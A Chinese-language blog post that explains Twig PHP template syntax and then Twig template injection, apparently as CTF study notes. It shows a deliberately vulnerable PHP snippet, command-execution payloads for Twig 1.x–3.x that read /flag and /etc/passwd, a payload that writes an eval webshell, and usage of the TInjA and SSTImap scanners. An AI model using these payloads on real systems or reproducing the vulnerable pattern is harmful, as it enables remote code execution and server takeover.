<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="zhangMini"><title>Twig PHP模版引擎 · Mini's blog</title><meta name="description" content="Twig 引擎Twig 是一个 PHP 模版引擎
语法特征插值Twig 使用 &amp;#123;&amp;#123;&amp;#125;&amp;#125; 表示插值，用于输出变量或表达式的值
可以使用 . 或 [] 访问变量中的属性
12&amp;#123;&amp;#123;user.name&amp;#125;&amp;#125;&amp;#123;&amp;#123;"><meta name="keywords" content="Security, life"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><meta name="generator" content="Hexo 6.3.0"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">Mini's blog</a></h3><div class="description"><p>Nothing lasts forever.</p></div></div></div><ul class="social-links"></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a target="_blank" rel="noopener" href="https://www.caicai.me"> CaiCai </a><span>&</span><a target="_blank" rel="noopener" href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/about">关于</a></li><li><a href="/archives">归档</a></li><li><a href="/tags">tags</a></li></div><div class="information"><div class="back_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li></div><div class="avatar"><img src="/images/favicon.png"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>Twig PHP模版引擎</a></h3></div><div class="post-content"><h2 id="Twig-引擎"><a href="#Twig-引擎" class="headerlink" title="Twig 引擎"></a>Twig 引擎</h2><p>Twig 是一个 PHP 模版引擎</p>
<h3 id="语法特征"><a href="#语法特征" class="headerlink" title="语法特征"></a>语法特征</h3><h4 id="插值"><a href="#插值" class="headerlink" title="插值"></a>插值</h4><p>Twig 使用 <code>&#123;&#123;&#125;&#125;</code> 表示插值，用于输出变量或表达式的值</p>
<p>可以使用 <code>.</code> 或 <code>[]</code> 访问变量中的属性</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;user.name&#125;&#125;</span><br><span class="line">&#123;&#123;user[<span class="string">&#x27;name&#x27;</span>]&#125;&#125;</span><br></pre></td></tr></table></figure>

<h4 id="控制结构"><a href="#控制结构" class="headerlink" title="控制结构"></a>控制结构</h4><p>Twig 支持常见控制结构，如 if-else、for 等</p>
<p>if-else 使用 <code>&#123;% if condition %&#125; ... &#123;% else %&#125; ... &#123;% endif %&#125;</code></p>
<p>for 循环使用 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> i in <span class="title function_ invoke__">range</span>(<span class="number">0</span>, <span class="number">3</span>) %&#125;</span><br><span class="line">    &#123;&#123; i &#125;&#125;,</span><br><span class="line">&#123;% <span class="keyword">endfor</span> %&#125;</span><br><span class="line"><span class="comment">// Output: 0, 1, 2, 3,</span></span><br></pre></td></tr></table></figure>

<p>也可以使用 <code>set</code> 为代码块内的变量赋值,如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;% set foo = <span class="string">&#x27;foo&#x27;</span> %&#125;</span><br><span class="line">&#123;% set foo = [<span class="number">1</span>, <span class="number">2</span>] %&#125;</span><br><span class="line">&#123;% set foo = &#123;<span class="string">&#x27;foo&#x27;</span>: <span class="string">&#x27;bar&#x27;</span>&#125; %&#125;</span><br></pre></td></tr></table></figure>
<h4 id="过滤器"><a href="#过滤器" class="headerlink" title="过滤器"></a>过滤器</h4><p>Twig 支持使用过滤器对变量进行处理</p>
<p>如 <code>&#123;&#123;user.name|upper&#125;&#125;</code> 表示将 <code>user.name</code> 变量的值转换为大写</p>
<p>下面这个过滤器将接收一个序列 list ，然后使用 <code>join</code> 中指定的分隔符合并成一个字符串</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; <span class="keyword">list</span>|join &#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123; [<span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;b&#x27;</span>, <span class="string">&#x27;c&#x27;</span>]|<span class="title function_ invoke__">join</span>(<span class="string">&#x27;|&#x27;</span>) &#125;&#125;</span><br><span class="line"><span class="comment">// Output: a|b|c</span></span><br></pre></td></tr></table></figure>

<h4 id="继承"><a href="#继承" class="headerlink" title="继承"></a>继承</h4><p>Twig 支持模板继承</p>
<p>通过 <code>&#123;% extends "base.html" %&#125;</code> 指定基础模板</p>
<p>并在子模板中使用 <code>&#123;% block content %&#125; ... &#123;% endblock %&#125;</code> 包裹子模版内容</p>
<h4 id="注释"><a href="#注释" class="headerlink" title="注释"></a>注释</h4><p>Twig 使用 &#96;&#96; 进行注释</p>
<h4 id="引入其他模版"><a href="#引入其他模版" class="headerlink" title="引入其他模版"></a>引入其他模版</h4><p>Twig 提供的 <code>include</code> 函数可以在模版中引入其他模版，并将该模版渲染后的内容返回到当前模版</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; <span class="keyword">include</span>(<span class="string">&#x27;sidebar.html&#x27;</span>) &#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Twig-模版注入"><a href="#Twig-模版注入" class="headerlink" title="Twig 模版注入"></a>Twig 模版注入</h3><p>和其他模版注入一样，Twig模版注入也是发生在直接将用户输入作为模版，如下面的代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require_once</span> <span class="keyword">__DIR__</span>.<span class="string">&#x27;/vendor/autoload.php&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$loader</span> = <span class="keyword">new</span> <span class="title class_">\Twig\Loader\ArrayLoader</span>();</span><br><span class="line"><span class="variable">$twig</span> = <span class="keyword">new</span> <span class="title class_">\Twig\Environment</span>(<span class="variable">$loader</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$template</span> = <span class="variable">$twig</span>-&gt;<span class="title function_ invoke__">createTemplate</span>(<span class="string">&quot;Hello <span class="subst">&#123;$_GET[&#x27;name&#x27;]&#125;</span>!&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$template</span>-&gt;<span class="title function_ invoke__">render</span>();</span><br></pre></td></tr></table></figure>

<h4 id="基础-payload"><a href="#基础-payload" class="headerlink" title="基础 payload"></a>基础 payload</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="title function_ invoke__">system</span>(<span class="string">&quot;cat /flag&quot;</span>)&#125;&#125;</span><br></pre></td></tr></table></figure>


<h4 id="Twig-1-x"><a href="#Twig-1-x" class="headerlink" title="Twig 1.x"></a>Twig 1.x</h4><p><code>getFilter</code> 方法调用任意 PHP 函数 payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;_self.env.<span class="title function_ invoke__">registerUndefinedFilterCallback</span>(<span class="string">&quot;exec&quot;</span>)&#125;&#125;&#123;&#123;_self.env.<span class="title function_ invoke__">getFilter</span>(<span class="string">&quot;cat /flag&quot;</span>)&#125;&#125;</span><br></pre></td></tr></table></figure>

<h4 id="Twig-2-x-x2F-3-x"><a href="#Twig-2-x-x2F-3-x" class="headerlink" title="Twig 2.x&#x2F;3.x"></a>Twig 2.x&#x2F;3.x</h4><p>代码执行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// map 过滤器</span></span><br><span class="line">&#123;&#123;[<span class="string">&quot;id&quot;</span>]|<span class="title function_ invoke__">map</span>(<span class="string">&quot;system&quot;</span>)&#125;&#125;</span><br><span class="line">&#123;&#123;[<span class="string">&quot;id&quot;</span>]|<span class="title function_ invoke__">map</span>(<span class="string">&quot;passthru&quot;</span>)&#125;&#125;</span><br><span class="line">&#123;&#123;[<span class="string">&#x27;id&#x27;</span>]|<span class="title function_ invoke__">map</span>(<span class="string">&#x27;system&#x27;</span>)|join&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// sort 过滤器</span></span><br><span class="line">&#123;&#123;[<span class="string">&#x27;id&#x27;</span>,<span class="number">1</span>]|<span class="title function_ invoke__">sort</span>(<span class="string">&#x27;system&#x27;</span>)|join&#125;&#125;</span><br><span class="line">&#123;&#123;[<span class="string">&quot;id&quot;</span>, <span class="number">0</span>]|<span class="title function_ invoke__">sort</span>(<span class="string">&quot;system&quot;</span>)&#125;&#125;</span><br><span class="line">&#123;&#123;[<span class="string">&quot;id&quot;</span>, <span class="number">0</span>]|<span class="title function_ invoke__">sort</span>(<span class="string">&quot;passthru&quot;</span>)&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// filter 过滤器</span></span><br><span class="line">&#123;&#123;[<span class="string">&#x27;cat\x20/etc/passwd&#x27;</span>]|<span class="title function_ invoke__">filter</span>(<span class="string">&#x27;system&#x27;</span>)&#125;&#125;</span><br><span class="line">&#123;&#123;[<span class="string">&#x27;cat$IFS/etc/passwd&#x27;</span>]|<span class="title function_ invoke__">filter</span>(<span class="string">&#x27;system&#x27;</span>)&#125;&#125;</span><br><span class="line">&#123;&#123;[<span class="string">&#x27;id&#x27;</span>]|<span class="title function_ invoke__">filter</span>(<span class="string">&#x27;system&#x27;</span>)&#125;&#125;</span><br><span class="line">&#123;&#123;[<span class="string">&#x27;id&#x27;</span>]|<span class="title function_ invoke__">filter</span>(<span class="string">&#x27;passthru&#x27;</span>)&#125;&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#123;&#123;[<span class="number">0</span>]|<span class="title function_ invoke__">reduce</span>(<span class="string">&#x27;system&#x27;</span>,<span class="string">&#x27;id&#x27;</span>)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>写 webshell</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#123;<span class="string">&quot;&lt;?php phpinfo();eval(<span class="subst">$_POST</span>[1])&quot;</span>:<span class="string">&quot;/var/www/html/shell.php&quot;</span>&#125;|<span class="title function_ invoke__">map</span>(<span class="string">&quot;file_put_contents&quot;</span>)&#125;&#125;    <span class="comment">// 写 Webshell</span></span><br></pre></td></tr></table></figure>

<h2 id="模版注入工具"><a href="#模版注入工具" class="headerlink" title="模版注入工具"></a>模版注入工具</h2><h3 id="TInjA"><a href="#TInjA" class="headerlink" title="TInjA"></a>TInjA</h3><p>支持模版引擎包括：</p>
<ul>
<li>.NET<ul>
<li>DotLiquid, Fluid, Razor Engine, Scriban</li>
</ul>
</li>
<li>Elixir<ul>
<li>EEx</li>
</ul>
</li>
<li>Go<ul>
<li>html&#x2F;template, text&#x2F;template</li>
</ul>
</li>
<li>Java<ul>
<li>Freemarker, Groovy, Thymeleaf, Velocity</li>
</ul>
</li>
<li>JavaScript<ul>
<li>Angular.js, Dot, EJS, Eta, Handlebars, Hogan.js, Mustache, Nunjucks, Pug, Twig.js, Underscore, Velocity.js, Vue.js</li>
</ul>
</li>
<li>PHP<ul>
<li>Blade, Latte, Mustache.php, Smarty, Twig</li>
</ul>
</li>
<li>Python<ul>
<li>Chameleon, Cheetah3, Django, Jinja2, Mako, Pystache, SimpleTemplate Engine, Tornado</li>
</ul>
</li>
<li>Ruby<ul>
<li>ERB, Erubi, Erubis, Haml, Liquid, Mustache, Slim</li>
</ul>
</li>
</ul>
<h4 id="使用方式"><a href="#使用方式" class="headerlink" title="使用方式"></a>使用方式</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">tinja url -u &quot;http://example.com/?name=Kirlia&quot; -H &quot;Authentication: Bearer ey...&quot;</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">-H 指定请求头</span></span><br><span class="line">tinja url -u &quot;http://example.com/&quot; -d &quot;username=Kirlia&quot;  -c &quot;PHPSESSID=ABC123...&quot;</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">-d 指定 POST 数据; -c 指定 Cookie</span></span><br></pre></td></tr></table></figure>

<h3 id="SSTImap"><a href="#SSTImap" class="headerlink" title="SSTImap"></a>SSTImap</h3><h4 id="使用方式-1"><a href="#使用方式-1" class="headerlink" title="使用方式"></a>使用方式</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python3 ./sstimap.py -u &#x27;https://example.com/page?name=John&#x27; -s</span><br><span class="line">python3 ./sstimap.py -u &#x27;https://example.com/page?name=Vulnerable*&amp;message=My_message&#x27; -l 5 -e jade</span><br><span class="line">python3 ./sstimap.py -i -A -m POST -l 5 -H &#x27;Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk&#x27;</span><br></pre></td></tr></table></figure></div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2025-01-13</span><i class="fa fa-tag"></i><a class="tag" href="/tags/web/" title="web">web </a></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/home?status=,http://example.com/2025/01/13/twig/,Mini's blog,Twig PHP模版引擎,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="next pagbuttons"><a class="btn" role="navigation" href="/2025/01/08/msf-2/" title="Metasploit (2)">下一篇</a></li></ul></div></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>